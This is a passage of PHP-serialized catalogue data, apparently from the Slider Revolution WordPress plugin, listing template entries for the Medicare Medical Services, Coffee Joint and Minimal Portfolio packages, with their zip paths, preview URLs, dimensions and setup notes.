About\";s:5:\"alias\";s:14:\"medicare-about\";s:3:\"zip\";s:24:\"packs/medicare-about.zip\";s:3:\"uid\";s:32:\"a3ab9e89155ef2542820343f30b29f72\";s:3:\"img\";s:25:\"medicare-about/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/medicare-medical-services-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">The Medicare Medical Services template is a great solution for your medical practice or hospital.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Medicare Medical Services\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"17\";s:9:\"installed\";b:0;}i:270;a:25:{s:2:\"id\";s:3:\"279\";s:5:\"title\";s:18:\"Medicare Highlight\";s:5:\"alias\";s:18:\"medicare-highlight\";s:3:\"zip\";s:28:\"packs/medicare-highlight.zip\";s:3:\"uid\";s:32:\"c3c8a74e5402489f1a85a0c83890ef1f\";s:3:\"img\";s:29:\"medicare-highlight/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/medicare-medical-services-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">The Medicare Medical Services template is a great solution for your medical practice or hospital.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Medicare Medical Services\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"17\";s:9:\"installed\";b:0;}i:271;a:25:{s:2:\"id\";s:3:\"280\";s:5:\"title\";s:17:\"Medicare Services\";s:5:\"alias\";s:17:\"medicare-services\";s:3:\"zip\";s:27:\"packs/medicare-services.zip\";s:3:\"uid\";s:32:\"8869b0834d4649dcc3221bed65980806\";s:3:\"img\";s:28:\"medicare-services/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/medicare-medical-services-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">The Medicare Medical Services template is a great solution for your medical practice or hospital.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Medicare Medical Services\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"17\";s:9:\"installed\";b:0;}i:272;a:25:{s:2:\"id\";s:3:\"281\";s:5:\"title\";s:16:\"Medicare Doctors\";s:5:\"alias\";s:16:\"medicare-doctors\";s:3:\"zip\";s:26:\"packs/medicare-doctors.zip\";s:3:\"uid\";s:32:\"2c9d57afd64244b5f7e30b0d87c842f9\";s:3:\"img\";s:27:\"medicare-doctors/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/medicare-medical-services-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">The Medicare Medical Services template is a great solution for your medical practice or hospital.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Medicare Medical Services\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"17\";s:9:\"installed\";b:0;}i:273;a:25:{s:2:\"id\";s:3:\"282\";s:5:\"title\";s:17:\"Medicare Research\";s:5:\"alias\";s:17:\"medicare-research\";s:3:\"zip\";s:27:\"packs/medicare-research.zip\";s:3:\"uid\";s:32:\"31e84a91fc8b8d5296e715e539a076d0\";s:3:\"img\";s:28:\"medicare-research/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/medicare-medical-services-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">The Medicare Medical Services template is a great solution for your medical practice or hospital.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Medicare Medical Services\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"17\";s:9:\"installed\";b:0;}i:274;a:25:{s:2:\"id\";s:3:\"283\";s:5:\"title\";s:19:\"Medicare Why Choose\";s:5:\"alias\";s:18:\"medicare-whychoose\";s:3:\"zip\";s:28:\"packs/medicare-whychoose.zip\";s:3:\"uid\";s:32:\"6dad61c672127de9e35884caa45d49a0\";s:3:\"img\";s:29:\"medicare-whychoose/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/medicare-medical-services-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">The Medicare Medical Services template is a great solution for your medical practice or hospital.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Medicare Medical Services\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"17\";s:9:\"installed\";b:0;}i:275;a:25:{s:2:\"id\";s:3:\"284\";s:5:\"title\";s:16:\"Medicare Contact\";s:5:\"alias\";s:16:\"medicare-contact\";s:3:\"zip\";s:26:\"packs/medicare-contact.zip\";s:3:\"uid\";s:32:\"89bc35ad8beb62a149c42262ae49a270\";s:3:\"img\";s:27:\"medicare-contact/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/medicare-medical-services-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">The Medicare Medical Services template is a great solution for your medical practice or hospital.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Medicare Medical Services\";s:13:\"package_order\";s:1:\"9\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"17\";s:9:\"installed\";b:0;}i:276;a:25:{s:2:\"id\";s:3:\"285\";s:5:\"title\";s:15:\"Medicare Footer\";s:5:\"alias\";s:15:\"medicare-footer\";s:3:\"zip\";s:25:\"packs/medicare-footer.zip\";s:3:\"uid\";s:32:\"ccf63e5233b3d63009e5ee90db51b37b\";s:3:\"img\";s:26:\"medicare-footer/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/medicare-medical-services-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">The Medicare Medical Services template is a great solution for your medical practice or hospital.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Medicare Medical Services\";s:13:\"package_order\";s:2:\"10\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"17\";s:9:\"installed\";b:0;}i:277;a:25:{s:2:\"id\";s:3:\"286\";s:5:\"title\";s:20:\"Coffee Joint Website\";s:5:\"alias\";s:20:\"coffee-joint-website\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:28:\"coffee-joint-website-package\";s:3:\"img\";s:27:\"packages/coffee_package.jpg\";s:7:\"preview\";s:76:\"https://revolution.themepunch.com/coffee-joint-coffee-shop-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:144:\"<span class=\"ttm_content\">The Coffee Joint website template is a great solution for your cafe or bistro.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Coffee Joint\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"18\";s:9:\"installed\";b:0;}i:278;a:25:{s:2:\"id\";s:3:\"287\";s:5:\"title\";s:11:\"Coffee Menu\";s:5:\"alias\";s:11:\"coffee-menu\";s:3:\"zip\";s:21:\"packs/coffee-menu.zip\";s:3:\"uid\";s:32:\"81195cad7be3f5180a267b34ce8cf966\";s:3:\"img\";s:22:\"coffee-menu/slide1.jpg\";s:7:\"preview\";s:76:\"https://revolution.themepunch.com/coffee-joint-coffee-shop-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:144:\"<span class=\"ttm_content\">The Coffee Joint website template is a great solution for your cafe or bistro.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Coffee Joint\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"18\";s:9:\"installed\";b:0;}i:279;a:25:{s:2:\"id\";s:3:\"288\";s:5:\"title\";s:13:\"Coffee Header\";s:5:\"alias\";s:13:\"coffee-header\";s:3:\"zip\";s:23:\"packs/coffee-header.zip\";s:3:\"uid\";s:32:\"5eed8adb9d3ae12168ad4735ac63eb20\";s:3:\"img\";s:24:\"coffee-header/slide1.jpg\";s:7:\"preview\";s:76:\"https://revolution.themepunch.com/coffee-joint-coffee-shop-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:144:\"<span class=\"ttm_content\">The Coffee Joint website template is a great solution for your cafe or bistro.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Coffee Joint\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"18\";s:9:\"installed\";b:0;}i:280;a:25:{s:2:\"id\";s:3:\"289\";s:5:\"title\";s:17:\"Coffee Philosophy\";s:5:\"alias\";s:17:\"coffee-philosophy\";s:3:\"zip\";s:27:\"packs/coffee-philosophy.zip\";s:3:\"uid\";s:32:\"76b5ccae3fa87fd0f991b87e7ae71c27\";s:3:\"img\";s:28:\"coffee-philosophy/slide1.jpg\";s:7:\"preview\";s:76:\"https://revolution.themepunch.com/coffee-joint-coffee-shop-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:144:\"<span class=\"ttm_content\">The Coffee Joint website template is a great solution for your cafe or bistro.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Coffee Joint\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"18\";s:9:\"installed\";b:0;}i:281;a:25:{s:2:\"id\";s:3:\"290\";s:5:\"title\";s:12:\"Coffee Carte\";s:5:\"alias\";s:12:\"coffee-carte\";s:3:\"zip\";s:22:\"packs/coffee-carte.zip\";s:3:\"uid\";s:32:\"470214ddd2cec585629fb79a0fd908d6\";s:3:\"img\";s:23:\"coffee-carte/slide1.jpg\";s:7:\"preview\";s:76:\"https://revolution.themepunch.com/coffee-joint-coffee-shop-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:144:\"<span class=\"ttm_content\">The Coffee Joint website template is a great solution for your cafe or bistro.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Coffee Joint\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"18\";s:9:\"installed\";b:0;}i:282;a:25:{s:2:\"id\";s:3:\"291\";s:5:\"title\";s:13:\"Coffee Teaser\";s:5:\"alias\";s:13:\"coffee-teaser\";s:3:\"zip\";s:23:\"packs/coffee-teaser.zip\";s:3:\"uid\";s:32:\"2ed868896c92a7bfb6431803c79e8486\";s:3:\"img\";s:24:\"coffee-teaser/slide1.jpg\";s:7:\"preview\";s:76:\"https://revolution.themepunch.com/coffee-joint-coffee-shop-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:144:\"<span class=\"ttm_content\">The Coffee Joint website template is a great solution for your cafe or bistro.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Coffee Joint\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"18\";s:9:\"installed\";b:0;}i:283;a:25:{s:2:\"id\";s:3:\"292\";s:5:\"title\";s:14:\"Coffee Find Us\";s:5:\"alias\";s:13:\"coffee-findus\";s:3:\"zip\";s:23:\"packs/coffee-findus.zip\";s:3:\"uid\";s:32:\"96d3784473dfa64bce9e1e4101919927\";s:3:\"img\";s:24:\"coffee-findus/slide1.jpg\";s:7:\"preview\";s:76:\"https://revolution.themepunch.com/coffee-joint-coffee-shop-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:144:\"<span class=\"ttm_content\">The Coffee Joint website template is a great solution for your cafe or bistro.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Coffee Joint\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"18\";s:9:\"installed\";b:0;}i:284;a:25:{s:2:\"id\";s:3:\"293\";s:5:\"title\";s:13:\"Coffee Footer\";s:5:\"alias\";s:13:\"coffee-footer\";s:3:\"zip\";s:23:\"packs/coffee-footer.zip\";s:3:\"uid\";s:32:\"6027c25e87a5fe7fd8727a51c0967915\";s:3:\"img\";s:24:\"coffee-footer/slide1.jpg\";s:7:\"preview\";s:76:\"https://revolution.themepunch.com/coffee-joint-coffee-shop-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:144:\"<span class=\"ttm_content\">The Coffee Joint website template is a great solution for your cafe or bistro.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Coffee Joint\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"18\";s:9:\"installed\";b:0;}i:285;a:25:{s:2:\"id\";s:3:\"294\";s:5:\"title\";s:17:\"Minimal Portfolio\";s:5:\"alias\";s:25:\"minimal-portfolio-website\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:25:\"minimal-portfolio-package\";s:3:\"img\";s:38:\"packages/minimal_portfolio_package.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/minimal-portfolio-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">The Minimal Portfolio template is a slide based website with additional modal detail pages.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Minimal Portfolio\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"19\";s:9:\"installed\";b:0;}i:286;a:25:{s:2:\"id\";s:3:\"295\";s:5:\"title\";s:17:\"Minimal Portfolio\";s:5:\"alias\";s:17:\"minimal-portfolio\";s:3:\"zip\";s:27:\"packs/minimal-portfolio.zip\";s:3:\"uid\";s:32:\"183b97b301d5ff0b171c067a87c8a3f5\";s:3:\"img\";s:28:\"minimal-portfolio/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/minimal-portfolio-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">The Minimal Portfolio template is a slide based website with additional modal detail pages.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Minimal 